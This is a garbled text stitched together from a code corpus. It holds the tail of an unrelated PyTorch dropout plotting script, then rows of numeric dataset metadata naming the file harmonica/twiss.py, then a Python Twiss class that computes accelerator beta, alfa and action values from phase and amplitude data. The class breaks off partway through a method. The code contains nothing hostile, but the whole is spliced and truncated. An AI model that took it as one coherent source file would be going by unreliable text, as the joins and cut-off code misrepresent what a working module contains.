plt.text(0, -1.5, 'dropout loss=%.4f' % loss_func(test_pred_drop, test_y).data.numpy(),
fontdict={'size': 12, 'color': 'orange'})
plt.legend(loc='upper left');
plt.ylim((-2.5, 2.5));
plt.pause(0.1)
# 将两个网络改回 训练形式
net_overfitting.train()
net_dropout.train()
plt.ioff()
plt.show()
| 32.326316
| 101
| 0.652231
| 491
| 3,071
| 3.912424
| 0.240326
| 0.054659
| 0.02811
| 0.043727
| 0.477876
| 0.477876
| 0.432067
| 0.432067
| 0.367517
| 0.367517
| 0
| 0.031163
| 0.184956
| 3,071
| 95
| 102
| 32.326316
| 0.736316
| 0.08043
| 0
| 0.2
| 0
| 0
| 0.05439
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.028571
| 0
| 0.028571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9b1301b28dc40f613c5048548a9e3fd67d1e1a8
| 72,649
|
py
|
Python
|
harmonica/twiss.py
|
i-a-morozov/harmonica
|
546e664e59457ad9cc354d108402137e90e0d8c2
|
[
"MIT"
] | null | null | null |
harmonica/twiss.py
|
i-a-morozov/harmonica
|
546e664e59457ad9cc354d108402137e90e0d8c2
|
[
"MIT"
] | null | null | null |
harmonica/twiss.py
|
i-a-morozov/harmonica
|
546e664e59457ad9cc354d108402137e90e0d8c2
|
[
"MIT"
] | null | null | null |
"""
Twiss module.
Compute twiss parameters from amplitude & phase data.
Twiss filtering & processing.
"""
import numpy
import torch
import pandas
from scipy import odr
from .util import mod, generate_pairs, generate_other
from .statistics import weighted_mean, weighted_variance
from .statistics import median, biweight_midvariance, standardize
from .anomaly import threshold, dbscan, local_outlier_factor, isolation_forest
from .decomposition import Decomposition
from .model import Model
from .table import Table
class Twiss():
"""
Returns
----------
Twiss class instance.
Parameters
----------
model: 'Model'
Model instance
table: 'Table'
Table instance
flag: torch.Tensor
external flags for each model location
limit: int | tuple
range limit to use, (min, max), 1 <= min <= max, mim is excluded, for full range min==max
use_model: bool
flag to use precomputed model data
Attributes
----------
model: 'Model'
Model instance
table: 'Table'
Table instance
limit: int | tuple
range limit to use, (min, max), 1 <= min <= max, mim is excluded, for full range min==max
use_model: bool
flag to use precomputed model data
dtype: torch.dtype
data type (from model)
device: torch.device
data device (from model)
flag: torch.Tensor
location flags
count: torch.Tensor
(uncoupled) range limit endpoints [1, 6, 15, 28, 45, 66, 91, 120, ...]
combo: torch.Tensor
(uncoupled) index combinations [..., [..., [[i, j], [i, k]], ...], ...]
shape: torch.Size
initial shape of combo
distance: torch.Tensor
(uncoupled) distance
fx: torch.Tensor
x phase for each location
fy: torch.Tensor
y phase for each location
sigma_fx: torch.Tensor
x phase error for each location
sigma_fy: torch.Tensor
y phase error for each location
fx_correct: torch.Tensor
corrected x phase for each location
fy_correct: torch.Tensor
corrected y phase for each location
sigma_fx_correct: torch.Tensor
corrected x phase error for each location
sigma_fy_correct: torch.Tensor
corrected y phase error for each location
virtual_x: dict
x plane virtual phase data
virtual_y: dict
y plane virtual phase data
correct_x: dict
x plane corrected phase data
correct_y: dict
y plane corrected phase data
action: dict
action data
dict_keys(['jx', 'sigma_jx', 'center_jx', 'spread_jx', 'jy', 'sigma_jy', 'center_jy', 'spread_jy', 'mask'])
data_amplitude: dict
twiss from amplitude data
dict_keys(['bx', 'sigma_bx', 'by', 'sigma_by'])
data_phase: dict
twiss from phase data
dict_keys(['fx_ij', 'sigma_fx_ij', 'fx_m_ij', 'sigma_fx_m_ij', 'fx_ik', 'sigma_fx_ik', 'fx_m_ik', 'sigma_fx_m_ik', 'fy_ij', 'sigma_fy_ij', 'fy_m_ij', 'sigma_fy_m_ij', 'fy_ik', 'sigma_fy_ik', 'fy_m_ik', 'sigma_fy_m_ik', 'ax', 'sigma_ax', 'bx', 'sigma_bx', 'ay', 'sigma_ay', 'by', 'sigma_by'])
ax: torch.Tensor
alfa x
sigma_ax: torch.Tensor
sigma alfa x
bx: torch.Tensor
beta x
sigma_bx: torch.Tensor
sigma beta x
ay: torch.Tensor
alfa y
sigma_ay: torch.Tensor
sigma alfa y
by: torch.Tensor
beta y
sigma_by: torch.Tensor
sigma beta y
Methods
----------
__init__(self, model:'Model', table:'Table', limit:int=8, use_model:bool=False) -> None
Twiss instance initialization.
get_action(self, *, data_threshold:dict={'use': True, 'factor': 5.0}, data_dbscan:dict={'use': False, 'factor': 2.5}, data_local_outlier_factor:dict={'use': False, 'contamination': 0.01}, data_isolation_forest:dict={'use': False, 'contamination': 0.01}, bx:torch.Tensor=None, by:torch.Tensor=None, sigma_bx:torch.Tensor=None, sigma_by:torch.Tensor=None)
Estimate actions at each monitor location with optional data cleaning and estimate action center and spread.
get_twiss_from_amplitude(self) -> None
Estimate twiss from amplitude.
phase_virtual(self, limit:int=None, exclude:list=None, **kwargs) -> None
Estimate x & y phase for virtual locations.
phase_correct(self, *, limit:int=None, **kwargs) -> None
Correct x & y phase for monitor locations.
phase_alfa(a_m:torch.Tensor, f_ij:torch.Tensor, f_m_ij:torch.Tensor, f_ik:torch.Tensor, f_m_ik:torch.Tensor, *, error:bool=True, model:bool=True, sigma_a_m:torch.Tensor=0.0, sigma_f_ij:torch.Tensor=0.0, sigma_f_m_ij:torch.Tensor=0.0, sigma_f_ik:torch.Tensor=0.0, sigma_f_m_ik:torch.Tensor=0.0) -> tuple
Estimate twiss alfa at index (i) from given triplet (i, j, k) phase data.
phase_beta(b_m:torch.Tensor, f_ij:torch.Tensor, f_m_ij:torch.Tensor, f_ik:torch.Tensor, f_m_ik:torch.Tensor, *, error:bool=True, model:bool=True, sigma_b_m:torch.Tensor=0.0, sigma_f_ij:torch.Tensor=0.0, sigma_f_m_ij:torch.Tensor=0.0, sigma_f_ik:torch.Tensor=0.0, sigma_f_m_ik:torch.Tensor=0.0) -> tuple
Estimate twiss beta at index (i) from given triplet (i, j, k) phase data.
get_twiss_from_phase(self, *, virtual:bool=True, error:bool=True, model:bool=False, use_correct:bool=False, use_correct_sigma:bool=False) -> None
Estimate twiss from phase data.
filter_twiss(self, plane:str = 'x', *, phase:dict={'use': True, 'threshold': 10.00}, model:dict={'use': True, 'threshold': 00.50}, value:dict={'use': True, 'threshold': 00.50}, sigma:dict={'use': True, 'threshold': 00.25}, limit:dict={'use': True, 'threshold': 05.00}) -> dict
Filter twiss for given data plane and cleaning options.
mask_range(self, limit:tuple) -> torch.Tensor
Generate weight mask based on given range limit.
mask_location(self, table:list) -> torch.Tensor
Generate weight mask based on given range limit.
mask_distance(self, function) -> torch.Tensor
Generate weight mask based on given range limit.
process_twiss(self, plane:str='x', *, weight:bool=True, mask:torch.Tensor=None) -> dict
Process twiss data.
get_twiss_from_data(self, n:int, x:torch.Tensor, y:torch.Tensor, *, refit:bool=False, factor:float=5.0, level:float=1.0E-6, sigma_x:torch.Tensor=None, sigma_y:torch.Tensor=None, ax:torch.Tensor=None, bx:torch.Tensor=None, ay:torch.Tensor=None, by:torch.Tensor=None, transport:torch.Tensor=None, **kwargs) -> dict
Estimate twiss from tbt data using ODR fit.
get_ax(self, index:int) -> torch.Tensor
Get ax value and error at given index.
get_bx(self, index:int) -> torch.Tensor
Get bx value and error at given index.
get_fx(self, index:int) -> torch.Tensor
Get fx value and error at given index.
get_ay(self, index:int) -> torch.Tensor
Get ay value and error at given index.
get_by(self, index:int) -> torch.Tensor
Get by value and error at given index.
get_fy(self, index:int) -> torch.Tensor
Get fy value and error at given index.
get_twiss(self, index:int) -> dict
Return twiss data at given index.
get_table(self) -> pandas.DataFrame
Return twiss data at all locations as dataframe.
__repr__(self) -> str
String representation.
__len__(self) -> int:
Number of locations.
__call__(self, limit:int=None) -> pandas.DataFrame
Perform twiss loop with default parameters.
matrix(self, probe:torch.Tensor, other:torch.Tensor) -> tuple
Generate uncoupled transport matrix (or matrices) for given locations.
make_transport(self) -> None
Set transport matrices between adjacent locations.
matrix_transport(self, probe:int, other:int) -> torch.Tensor
Generate transport matrix from probe to other using self.transport.
normal(self, probe:torch.Tensor) -> tuple
Generate uncoupled normal matrix (or matrices) for given locations.
"""
def __init__(self, model:'Model', table:'Table', flag:torch.Tensor=None, limit:int=8, use_model:bool=False) -> None:
"""
Twiss instance initialization.
Parameters
----------
model: 'Model'
Model instance
table: 'Table'
Table instance
flag: torch.Tensor
external flags for each model location
limit: int | tuple
range limit to use, (min, max), 1 <= min <= max, mim is excluded, for full range min==max
use_model: bool
flag to use precomputed model data
Returns
-------
None
"""
self.model, self.table, self.limit, self.use_model = model, table, limit, use_model
self.limit = self.limit if isinstance(self.limit, tuple) else (self.limit, self.limit)
if self.use_model:
if self.model.limit is None:
raise Exception(f'TWISS: model limit is None')
if self.model.limit < max(self.limit):
raise Exception(f'TWISS: requested limit={self.limit} should be less than model limit={self.model.limit}')
self.size, self.dtype, self.device = self.model.size, self.model.dtype, self.model.device
if self.model.monitor_count != self.table.size:
raise Exception(f'TWISS: expected {self.model.monitor_count} monitors in Model, got {self.table.size} in Table')
if flag is None:
self.flag = [flag if kind == self.model._monitor else 0 for flag, kind in zip(self.model.flag, self.model.kind)]
self.flag = torch.tensor(self.flag, dtype=torch.int64, device=self.device)
else:
if len(flag) != self.size:
raise Exception(f'TWISS: external flag length {len(flag)}, expected length {self.size}')
self.flag = flag.to(torch.int64).to(self.device)
if self.use_model:
self.count = self.model.count
self.combo = self.model.combo
self.index = self.model.index
else:
self.count = torch.tensor([limit*(2*limit - 1) for limit in range(1, max(self.limit) + 1)], dtype=torch.int64, device=self.device)
self.combo = [generate_other(probe, max(self.limit), self.flag) for probe in range(self.size)]
self.combo = torch.stack([generate_pairs(max(self.limit), 1 + 1, probe=probe, table=table, dtype=torch.int64, device=self.device) for probe, table in enumerate(self.combo)])
self.index = mod(self.combo, self.size).to(torch.int64)
self.shape = self.combo.shape
self.distance = torch.ones(max(self.limit)*(2*max(self.limit) - 1), dtype=self.dtype, device=self.device)
for index in self.count:
self.distance[index:] += 1.0
limit_min, limit_max = self.limit
if limit_min == limit_max:
self.count = self.count[:limit_max]
*_, count_max = self.count
self.combo = self.combo[:, :count_max]
self.index = self.index[:, :count_max]
self.distance = self.distance[:count_max]
if limit_min < limit_max:
self.count = self.count[limit_min - 1:limit_max]
count_min, *_, count_max = self.count
self.combo = self.combo[:, count_min:count_max]
self.index = self.index[:, count_min:count_max]
self.distance = self.distance[count_min:count_max]
if limit_min > limit_max:
raise Exception(f'TWISS: invalid limit={self.limit}')
self.fx = torch.zeros_like(self.model.fx)
self.fy = torch.zeros_like(self.model.fy)
self.fx[self.model.monitor_index] = self.table.fx
self.fy[self.model.monitor_index] = self.table.fy
self.sigma_fx = torch.zeros_like(self.model.sigma_fx)
self.sigma_fy = torch.zeros_like(self.model.sigma_fy)
self.sigma_fx[self.model.monitor_index] = self.table.sigma_fx
self.sigma_fy[self.model.monitor_index] = self.table.sigma_fy
self.fx_correct, self.sigma_fx_correct = torch.clone(self.fx), torch.clone(self.sigma_fx)
self.fy_correct, self.sigma_fy_correct = torch.clone(self.fy), torch.clone(self.sigma_fy)
self.virtual_x, self.correct_x = {}, {}
self.virtual_y, self.correct_y = {}, {}
self.action, self.data_amplitude, self.data_phase = {}, {}, {}
self.ax, self.sigma_ax = torch.zeros_like(self.model.ax), torch.zeros_like(self.model.sigma_ax)
self.bx, self.sigma_bx = torch.zeros_like(self.model.bx), torch.zeros_like(self.model.sigma_bx)
self.ay, self.sigma_ay = torch.zeros_like(self.model.ay), torch.zeros_like(self.model.sigma_ay)
self.by, self.sigma_by = torch.zeros_like(self.model.by), torch.zeros_like(self.model.sigma_by)
if self.use_model:
self.fx_ij, self.sigma_fx_ij = self.model.fx_ij.to(self.dtype).to(self.device), self.model.sigma_fx_ij.to(self.dtype).to(self.device)
self.fx_ik, self.sigma_fx_ik = self.model.fx_ik.to(self.dtype).to(self.device), self.model.sigma_fx_ik.to(self.dtype).to(self.device)
self.fy_ij, self.sigma_fy_ij = self.model.fy_ij.to(self.dtype).to(self.device), self.model.sigma_fy_ij.to(self.dtype).to(self.device)
self.fy_ik, self.sigma_fy_ik = self.model.fy_ik.to(self.dtype).to(self.device), self.model.sigma_fy_ik.to(self.dtype).to(self.device)
if self.use_model and flag != None:
size, length, *_ = self.index.shape
self.mask = torch.ones((size, length)).to(torch.bool).to(self.device)
for location, flag in enumerate(self.flag):
if not flag and self.model.flag[location] != 0:
_, other = self.index.swapaxes(0, -1)
other = torch.mul(*(other != location).swapaxes(0, 1)).T
self.mask = (self.mask == other)
def get_action(self, *,
data_threshold:dict={'use': True, 'factor': 5.0},
data_dbscan:dict={'use': False, 'factor': 2.5},
data_local_outlier_factor:dict={'use': False, 'contamination': 0.01},
data_isolation_forest:dict={'use': False, 'contamination': 0.01},
bx:torch.Tensor=None, by:torch.Tensor=None,
sigma_bx:torch.Tensor=None, sigma_by:torch.Tensor=None) -> None:
"""
Estimate actions at each monitor location with optional data cleaning and estimate action center and spread.
Parameters
----------
data_threshold: dict
parameters for threshold detector
data_dbscan: dict
parameters for dbscan detector
data_local_outlier_factor: dict
parameters for local outlier factor detector
data_isolation_forest: dict
parameters for isolation forest detector
bx: torch.Tensor
bx values at monitor locations
by: torch.Tensor
by values at monitor locations
sigma_bx: torch.Tensor
bx errors at monitor locations
sigma_by: torch.Tensor
by errors at monitor locations
Returns
-------
None, update self.action dictionary
"""
self.action = {}
index = self.model.monitor_index
bx = bx if bx is not None else self.model.bx[index]
by = by if by is not None else self.model.by[index]
sigma_bx = sigma_bx if sigma_bx is not None else self.model.sigma_bx[index]
sigma_by = sigma_by if sigma_by is not None else self.model.sigma_by[index]
jx = self.table.ax**2/(2.0*bx)
jy = self.table.ay**2/(2.0*by)
sigma_jx = self.table.ax**2/bx**2*self.table.sigma_ax**2
sigma_jx += self.table.ax**4/bx**4/4*sigma_bx**2
sigma_jx.sqrt_()
sigma_jy = self.table.ay**2/by**2*self.table.sigma_ay**2
sigma_jy += self.table.ay**4/by**4/4*sigma_by**2
sigma_jy.sqrt_()
mask = torch.clone(self.flag[index])
mask = torch.stack([mask, mask]).to(torch.bool)
data = standardize(torch.stack([jx, jy]), center_estimator=median, spread_estimator=biweight_midvariance)
if data_threshold['use']:
factor = data_threshold['factor']
center = median(data)
spread = biweight_midvariance(data).sqrt()
min_value, max_value = center - factor*spread, center + factor*spread
mask *= threshold(data, min_value, max_value)
if data_dbscan['use']:
factor = data_dbscan['factor']
for case in range(1):
mask[case] *= dbscan(data[case].reshape(-1, 1), epsilon=factor)
if data_local_outlier_factor['use']:
for case in range(1):
mask[case] *= local_outlier_factor(data[case].reshape(-1, 1), contamination=data_local_outlier_factor['contamination'])
if data_isolation_forest['use']:
for case in range(1):
mask[case] *= isolation_forest(data[case].reshape(-1, 1), contamination=data_isolation_forest['contamination'])
mask_jx, mask_jy = mask
mask_jx, mask_jy = mask_jx/sigma_jx**2, mask_jy/sigma_jy**2
center_jx = weighted_mean(jx, weight=mask_jx)
spread_jx = weighted_variance(jx, weight=mask_jx, center=center_jx).sqrt()
center_jy = weighted_mean(jy, weight=mask_jy)
spread_jy = weighted_variance(jy, weight=mask_jy, center=center_jy).sqrt()
self.action['jx'], self.action['sigma_jx'] = jx, sigma_jx
self.action['center_jx'], self.action['spread_jx'] = center_jx, spread_jx
self.action['jy'], self.action['sigma_jy'] = jy, sigma_jy
self.action['center_jy'], self.action['spread_jy'] = center_jy, spread_jy
self.action['mask'] = mask
def get_twiss_from_amplitude(self) -> None:
"""
Estimate twiss from amplitude.
Note, action dictionary should be precomputed
Parameters
----------
None
Returns
-------
None, update self.twiss_from_amplitude dictionary
"""
if self.action == {}:
raise Exception('error: action dictionary is empty')
self.data_amplitude = {}
ax, sigma_ax = self.table.ax, self.table.sigma_ax
ay, sigma_ay = self.table.ay, self.table.sigma_ay
jx, sigma_jx = self.action['center_jx'], self.action['spread_jx']
jy, sigma_jy = self.action['center_jy'], self.action['spread_jy']
bx, by = ax**2/(2.0*jx), ay**2/(2.0*jy)
sigma_bx = torch.sqrt(ax**2/jx**2*sigma_ax**2 + 0.25*ax**4/jx**4*sigma_jx**2)
sigma_by = torch.sqrt(ay**2/jy**2*sigma_ay**2 + 0.25*ay**4/jy**4*sigma_jy**2)
index = self.model.monitor_index
bx_model, by_model = self.model.bx[index], self.model.by[index]
self.data_amplitude['bx'], self.data_amplitude['sigma_bx'] = bx, sigma_bx
self.data_amplitude['by'], self.data_amplitude['sigma_by'] = by, sigma_by
def phase_virtual(self, limit:int=None, exclude:list=None, **kwargs) -> None:
"""
Estimate x & y phase for virtual locations.
Parameters
----------
limit: int
range limit to use
exclude: list
list of virtual location to exclude
**kwargs:
passed to Decomposition.phase_virtual
Returns
-------
None, update self.virtual_x and self.virtual_y dictionaries
"""
self.virtual_x, self.virtual_y = {}, {}
limit = max(self.limit) if limit is None else limit
exclude = [] if exclude is None else exclude
index = [index for index in self.model.virtual_index if index not in exclude]
nux, sigma_nux = self.table.nux, self.table.sigma_nux
NUX, sigma_NUX = self.model.nux, self.model.sigma_nux
nuy, sigma_nuy = self.table.nuy, self.table.sigma_nuy
NUY, sigma_NUY = self.model.nuy, self.model.sigma_nuy
fx, sigma_fx = self.fx, self.sigma_fx
FX, sigma_FX = self.model.fx, self.model.sigma_fx
fy, sigma_fy = self.fy, self.sigma_fy
FY, sigma_FY = self.model.fy, self.model.sigma_fy
def auxiliary_x(probe):
return Decomposition.phase_virtual(probe, limit, self.flag, nux, NUX, fx, FX,
sigma_frequency=sigma_nux, sigma_frequency_model=sigma_NUX,
sigma_phase=sigma_fx, sigma_phase_model=sigma_FX,
**kwargs)
def auxiliary_y(probe):
return Decomposition.phase_virtual(probe, limit, self.flag, nuy, NUY, fy, FY,
sigma_frequency=sigma_nuy, sigma_frequency_model=sigma_NUY,
sigma_phase=sigma_fy, sigma_phase_model=sigma_FY,
**kwargs)
data_x = [auxiliary_x(probe) for probe in index]
data_y = [auxiliary_y(probe) for probe in index]
for count, probe in enumerate(index):
self.virtual_x[probe], self.virtual_y[probe] = data_x[count], data_y[count]
self.fx[probe], self.sigma_fx[probe] = self.virtual_x[probe].get('model')
self.fy[probe], self.sigma_fy[probe] = self.virtual_y[probe].get('model')
def phase_correct(self, *, limit:int=None, **kwargs) -> None:
"""
Correct x & y phase for monitor locations.
Note, this introduce strong bias towards model, do not use large range limit
Note, phase at the location is not used
Parameters
----------
limit: int
range limit
**kwargs:
passed to phase_virtual Decomposition method
Returns
-------
None, update self.correct_x and self.correct_y dictionaries
"""
self.correct_x, self.correct_y = {}, {}
limit = max(self.limit) if limit is None else limit
index = self.model.monitor_index
self.fx_correct, self.sigma_fx_correct = torch.clone(self.fx), torch.clone(self.sigma_fx)
self.fy_correct, self.sigma_fy_correct = torch.clone(self.fy), torch.clone(self.sigma_fy)
nux, sigma_nux = self.table.nux, self.table.sigma_nux
NUX, sigma_NUX = self.model.nux, self.model.sigma_nux
nuy, sigma_nuy = self.table.nuy, self.table.sigma_nuy
NUY, sigma_NUY = self.model.nuy, self.model.sigma_nuy
fx, sigma_fx = self.fx, self.sigma_fx
FX, sigma_FX = self.model.fx, self.model.sigma_fx
fy, sigma_fy = self.fy, self.sigma_fy
FY, sigma_FY = self.model.fy, self.model.sigma_fy
def auxiliary_x(probe):
return Decomposition.phase_virtual(probe, limit, self.flag, nux, NUX, fx, FX,
sigma_frequency=sigma_nux, sigma_frequency_model=sigma_NUX,
sigma_phase=sigma_fx, sigma_phase_model=sigma_FX,
**kwargs)
def auxiliary_y(probe):
return Decomposition.phase_virtual(probe, limit, self.flag, nuy, NUY, fy, FY,
sigma_frequency=sigma_nuy, sigma_frequency_model=sigma_NUY,
sigma_phase=sigma_fy, sigma_phase_model=sigma_FY,
**kwargs)
data_x = [auxiliary_x(probe) for probe in index]
data_y = [auxiliary_y(probe) for probe in index]
for count, probe in enumerate(index):
self.correct_x[probe], self.correct_y[probe] = data_x[count], data_y[count]
self.fx_correct[probe], self.sigma_fx_correct[probe] = self.correct_x[probe].get('model')
self.fy_correct[probe], self.sigma_fy_correct[probe] = self.correct_y[probe].get('model')
@staticmethod
def phase_alfa(a_m:torch.Tensor,
f_ij:torch.Tensor, f_m_ij:torch.Tensor,
f_ik:torch.Tensor, f_m_ik:torch.Tensor,
*,
error:bool=True, model:bool=True,
sigma_a_m:torch.Tensor=0.0,
sigma_f_ij:torch.Tensor=0.0, sigma_f_m_ij:torch.Tensor=0.0,
sigma_f_ik:torch.Tensor=0.0, sigma_f_m_ik:torch.Tensor=0.0) -> tuple:
"""
Estimate twiss alfa at index (i) from given triplet (i, j, k) phase data.
Note, probed index (i), other indices (j) and (k), pairs (i, j) and (i, k)
Phase advance is assumed to be from (i) to other indices, should be negative if (i) is ahead of the other index (timewise)
Parameters
----------
a_m: torch.Tensor
model value
f_ij: torch.Tensor
phase advance between probed and the 1st index (j)
f_m_ij: torch.Tensor
model phase advance between probed and the 1st index (j)
f_ik: torch.Tensor
phase advance between probed and the 2nd index (k)
f_m_ik: torch.Tensor
model phase advance between probed and 2nd index (k)
error: bool
flag to compute error
model: bool
flag to include model error
sigma_a_m: torch.Tensor
model value error
sigma_f_ij: torch.Tensor
phase advance error between probed and the 1st index (j)
sigma_f_m_ij: torch.Tensor
model phase advance error between probed and the 1st index (j)
sigma_f_ik: torch.Tensor
phase advance error between probed and the 2nd index (k)
sigma_f_m_ik: torch.Tensor
model phase advance error between probed and the 2nd index (k)
Returns
-------
(a, 0) or (a, sigma_a)
"""
a = a_m*(1.0/torch.tan(f_ij)-1.0/torch.tan(f_ik))/(1.0/torch.tan(f_m_ij)-1.0/torch.tan(f_m_ik))-1.0/torch.tan(f_ij)*1.0/torch.sin(f_m_ij - f_m_ik)*torch.cos(f_m_ik)*torch.sin(f_m_ij) + 1.0/torch.tan(f_ik)*1.0/torch.sin(f_m_ij - f_m_ik)*torch.cos(f_m_ij)*torch.sin(f_m_ik)
if not error:
return (a, torch.zeros_like(a))
sigma_a = sigma_f_ij**2*(1.0/torch.sin(f_ij))**4*(1.0/torch.tan(f_m_ik) + a_m)**2/(1.0/torch.tan(f_m_ij) - 1.0/torch.tan(f_m_ik))**2
sigma_a += sigma_f_ik**2*(1.0/torch.sin(f_ik))**4*(1.0/torch.tan(f_m_ij) + a_m)**2/(1.0/torch.tan(f_m_ij) - 1.0/torch.tan(f_m_ik))**2
if model:
sigma_a += sigma_a_m**2*((1.0/torch.tan(f_ij) - 1.0/torch.tan(f_ik))**2/(1.0/torch.tan(f_m_ij) - 1.0/torch.tan(f_m_ik))**2)
sigma_a += sigma_f_m_ik**2*(1.0/torch.tan(f_ij) - 1.0/torch.tan(f_ik))**2*(1.0/torch.sin(f_m_ij - f_m_ik))**4*torch.sin(f_m_ij)**2*(torch.cos(f_m_ij) + a_m*torch.sin(f_m_ij))**2
sigma_a += sigma_f_m_ij**2*(1.0/torch.tan(f_ij) - 1.0/torch.tan(f_ik))**2*(1.0/torch.sin(f_m_ij - f_m_ik))**4*torch.sin(f_m_ik)**2*(torch.cos(f_m_ik) + a_m*torch.sin(f_m_ik))**2
sigma_a.sqrt_()
return (a, sigma_a)
@staticmethod
def phase_beta(b_m:torch.Tensor,
f_ij:torch.Tensor, f_m_ij:torch.Tensor,
f_ik:torch.Tensor, f_m_ik:torch.Tensor,
*,
error:bool=True, model:bool=True,
sigma_b_m:torch.Tensor=0.0,
sigma_f_ij:torch.Tensor=0.0, sigma_f_m_ij:torch.Tensor=0.0,
sigma_f_ik:torch.Tensor=0.0, sigma_f_m_ik:torch.Tensor=0.0) -> tuple:
"""
Estimate twiss beta at index (i) from given triplet (i, j, k) phase data.
Note, probed index (i), other indices (j) and (k), pairs (i, j) and (i, k)
Phase advance is assumed to be from (i) to other indices, should be negative if (i) is ahead of the other index (timewise)
Parameters
----------
b_m: torch.Tensor
model value
f_ij: torch.Tensor
phase advance between probed and the 1st index (j)
f_m_ij: torch.Tensor
model phase advance between probed and the 1st index (j)
f_ik: torch.Tensor
phase advance between probed and the 2nd index (k)
f_m_ik: torch.Tensor
model phase advance between probed and 2nd index (k)
error: bool
flag to compute error
model: bool
flag to include model error
sigma_b_m: torch.Tensor
model value error
sigma_f_ij: torch.Tensor
phase advance error between probed and the 1st index (j)
sigma_f_m_ij: torch.Tensor
model phase advance error between probed and the 1st index (j)
sigma_f_ik: torch.Tensor
phase advance error between probed and the 2nd index (k)
sigma_f_m_ik: torch.Tensor
model phase advance error between probed and the 2nd index (k)
Returns
-------
(b, 0) or (b, sigma_b)
"""
b = b_m*(1.0/torch.tan(f_ij) - 1.0/torch.tan(f_ik))/(1.0/torch.tan(f_m_ij) - 1.0/torch.tan(f_m_ik))
if not error:
return (b, torch.zeros_like(b))
sigma_b = sigma_f_ij**2*b_m**2*(1.0/torch.sin(f_ij))**4/(1.0/torch.tan(f_m_ij) - 1.0/torch.tan(f_m_ik))**2
sigma_b += sigma_f_ik**2*b_m**2*(1.0/torch.sin(f_ik))**4/(1.0/torch.tan(f_m_ij) - 1.0/torch.tan(f_m_ik))**2
if model:
sigma_b += sigma_b_m**2*(1.0/torch.tan(f_ij) - 1.0/torch.tan(f_ik))**2/(1.0/torch.tan(f_m_ij) - 1.0/torch.tan(f_m_ik))**2
sigma_b += sigma_f_m_ij**2*b_m**2*(1.0/torch.tan(f_ij) - 1.0/torch.tan(f_ik))**2*(1.0/torch.sin(f_m_ij))**4/(1.0/torch.tan(f_m_ij) - 1.0/torch.tan(f_m_ik))**4
sigma_b += sigma_f_m_ik**2*b_m**2*(1.0/torch.tan(f_ij) - 1.0/torch.tan(f_ik))**2*(1.0/torch.sin(f_m_ik))**4/(1.0/torch.tan(f_m_ij) - 1.0/torch.tan(f_m_ik))**4
sigma_b.sqrt_()
return (b, sigma_b)
def get_twiss_from_phase(self, *, virtual:bool=True, error:bool=True, model:bool=False,
use_correct:bool=False, use_correct_sigma:bool=False, use_model:bool=False) -> None:
"""
Estimate twiss from phase data.
Note, raw data is saved, no cleaning is performed
Values (and errors) are computed for each triplet
Parameters
----------
error: bool
flag to compute twiss errors
model: bool
flag to include model error
use_correct: bool
flag to use corrected phases
use_correct_sigma: bool
flag to use corrected phase errors
use_model: bool
flag to use precomputed model data
Returns
-------
None, update self.twiss_from_phase dictionary
"""
self.data_phase = {}
fx = self.fx_correct if use_correct else self.fx
fy = self.fy_correct if use_correct else self.fy
sigma_fx = self.sigma_fx_correct if use_correct_sigma else self.sigma_fx
sigma_fy = self.sigma_fy_correct if use_correct_sigma else self.sigma_fy
ax_m, bx_m = self.model.ax, self.model.bx
ay_m, by_m = self.model.ay, self.model.by
index = self.combo.swapaxes(0, -1)
value, sigma = Decomposition.phase_advance(*index, self.table.nux, fx, error=error, model=False, sigma_frequency=self.table.sigma_nux, sigma_phase=sigma_fx)
fx_ij, fx_ik = value.swapaxes(0, 1)
sx_ij, sx_ik = sigma.swapaxes(0, 1)
value, sigma = Decomposition.phase_advance(*index, self.table.nuy, fy, error=error, model=False, sigma_frequency=self.table.sigma_nuy, sigma_phase=sigma_fy)
fy_ij, fy_ik = value.swapaxes(0, 1)
sy_ij, sy_ik = sigma.swapaxes(0, 1)
if use_model:
fx_m_ij, fx_m_ik = self.fx_ij, self.fx_ik
sx_m_ij, sx_m_ik = self.sigma_fx_ij, self.sigma_fx_ik
fy_m_ij, fy_m_ik = self.fy_ij, self.fy_ik
sy_m_ij, sy_m_ik = self.sigma_fy_ij, self.sigma_fy_ik
else:
value, sigma = Decomposition.phase_advance(*index, self.model.nux, self.model.fx, error=error*model, model=True, sigma_frequency=self.model.sigma_nux, sigma_phase=self.model.sigma_fx)
fx_m_ij, fx_m_ik = value.swapaxes(0, 1)
sx_m_ij, sx_m_ik = sigma.swapaxes(0, 1)
value, sigma = Decomposition.phase_advance(*index, self.model.nuy, self.model.fy, error=error*model, model=True, sigma_frequency=self.model.sigma_nuy, sigma_phase=self.model.sigma_fy)
fy_m_ij, fy_m_ik = value.swapaxes(0, 1)
sy_m_ij, sy_m_ik = sigma.swapaxes(0, 1)
ax, sigma_ax = self.phase_alfa(ax_m, fx_ij, fx_m_ij, fx_ik, fx_m_ik, error=error, model=model, sigma_a_m=self.model.sigma_ax, sigma_f_ij=sx_ij, sigma_f_ik=sx_ik, sigma_f_m_ij=sx_m_ij, sigma_f_m_ik=sx_m_ik)
bx, sigma_bx = self.phase_beta(bx_m, fx_ij, fx_m_ij, fx_ik, fx_m_ik, error=error, model=model, sigma_b_m=self.model.sigma_bx, sigma_f_ij=sx_ij, sigma_f_ik=sx_ik, sigma_f_m_ij=sx_m_ij, sigma_f_m_ik=sx_m_ik)
ay, sigma_ay = self.phase_alfa(ay_m, fy_ij, fy_m_ij, fy_ik, fy_m_ik, error=error, model=model, sigma_a_m=self.model.sigma_ay, sigma_f_ij=sy_ij, sigma_f_ik=sy_ik, sigma_f_m_ij=sy_m_ij, sigma_f_m_ik=sy_m_ik)
by, sigma_by = self.phase_beta(by_m, fy_ij, fy_m_ij, fy_ik, fy_m_ik, error=error, model=model, sigma_b_m=self.model.sigma_by, sigma_f_ij=sy_ij, sigma_f_ik=sy_ik, sigma_f_m_ij=sy_m_ij, sigma_f_m_ik=sy_m_ik)
self.data_phase['fx_ij'], self.data_phase['sigma_fx_ij'], self.data_phase['fx_m_ij'], self.data_phase['sigma_fx_m_ij'] = fx_ij.T, sx_ij.T, fx_m_ij.T, sx_m_ij.T
